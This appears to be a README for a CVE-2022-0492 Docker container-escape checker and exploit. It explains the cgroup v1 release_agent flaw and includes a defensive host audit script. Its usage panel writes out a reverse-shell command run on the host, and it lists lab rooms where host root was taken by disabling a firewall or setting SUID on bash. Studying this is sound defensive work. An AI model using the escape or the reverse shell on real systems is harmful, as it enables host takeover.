# CVE-2022-0492 Docker Breakout Checker and PoC

## Summary

Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.

A vulnerability was found in the Linux kernel's cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c. Under certain circumstances, this flaw allows the cgroups v1 release_agent feature to be used to escalate privileges and unexpectedly bypass namespace isolation.

Put more simply, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges and take control of the system. Normally, however, the release_agent file is owned by root, so only a user with root access can modify it.
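A host-side check for the state this flaw leaves behind, added here as an example that is not part of this tool: it lists every mounted cgroup v1 hierarchy and flags any whose root release_agent has been set. It assumes a Linux host with /proc/self/mountinfo; the mountinfo sample embedded for self-testing is constructed.

```python
"""Host-side audit for the artefact CVE-2022-0492 exploitation leaves behind:
a release_agent set on a cgroup v1 hierarchy.  Added example, not part of this
tool; assumes a Linux host with /proc/self/mountinfo."""
import sys
from typing import Dict, List

# Constructed sample of /proc/self/mountinfo: one cgroup2 and two cgroup v1 mounts.
SAMPLE_MOUNTINFO = """\
30 24 0:27 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime shared:9 - tmpfs tmpfs ro,mode=755
31 30 0:28 / /sys/fs/cgroup/unified rw,nosuid,nodev,noexec,relatime shared:10 - cgroup2 cgroup2 rw,nsdelegate
32 30 0:29 / /sys/fs/cgroup/rdma rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,rdma
33 30 0:30 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,memory
"""

def cgroup_v1_mounts(mountinfo: str) -> List[str]:
    """Mount points whose filesystem type is exactly 'cgroup' (v1, not 'cgroup2')."""
    mounts = []
    for line in mountinfo.splitlines():
        if " - " not in line:
            continue
        pre, post = line.split(" - ", 1)   # optional fields end at the " - " separator
        if post.split()[0] == "cgroup":
            mounts.append(pre.split()[4])  # field 5 of mountinfo is the mount point
    return mounts

def assess(mountpoint: str, release_agent: str) -> Dict[str, str]:
    """A non-empty root release_agent is what to review: the kernel runs that path
    as root in the host namespaces when a cgroup with notify_on_release=1 empties."""
    agent = release_agent.strip()
    if agent:
        return {"mount": mountpoint, "level": "SUSPICIOUS", "detail": f"release_agent={agent!r}"}
    return {"mount": mountpoint, "level": "INFO", "detail": "release_agent empty"}

def audit(mountinfo_path: str = "/proc/self/mountinfo") -> List[Dict[str, str]]:
    with open(mountinfo_path) as fh:
        mountinfo = fh.read()
    results = []
    for mp in cgroup_v1_mounts(mountinfo):
        try:
            with open(f"{mp}/release_agent") as fh:
                results.append(assess(mp, fh.read()))
        except OSError as exc:  # root of the hierarchy not readable from this context
            results.append({"mount": mp, "level": "ERROR", "detail": str(exc)})
    return results

if __name__ == "__main__":
    findings = audit()
    for r in findings:
        print(f"[{r['level']}] {r['mount']}: {r['detail']}")
    sys.exit(1 if any(r["level"] == "SUSPICIOUS" for r in findings) else 0)
```

Run it as root on the host rather than inside a container. The durable fix is a patched kernel or cgroup v2; Docker's default seccomp and AppArmor profiles also prevent mounting cgroupfs from inside a container.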

## Usage

```text
[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh    --checker                Verify if system is vulnerable.
        sh -c|--command <COMMAND>      Execute command on host machine.
        sh -h|--help                   Print the help panel.

[>] Example:
        sh --command 'bash -c "bash -i >& /dev/tcp/ 0>&1"'
```


## Examples

### Hamlet (TryHackMe)
Root user on the host machine pwned by disabling UFW and then sending a reverse shell.


### Misguided Ghosts (TryHackMe)
Root user on the host machine pwned by setting the SUID bit on bash; a reverse shell was sent as well.


#### Sources: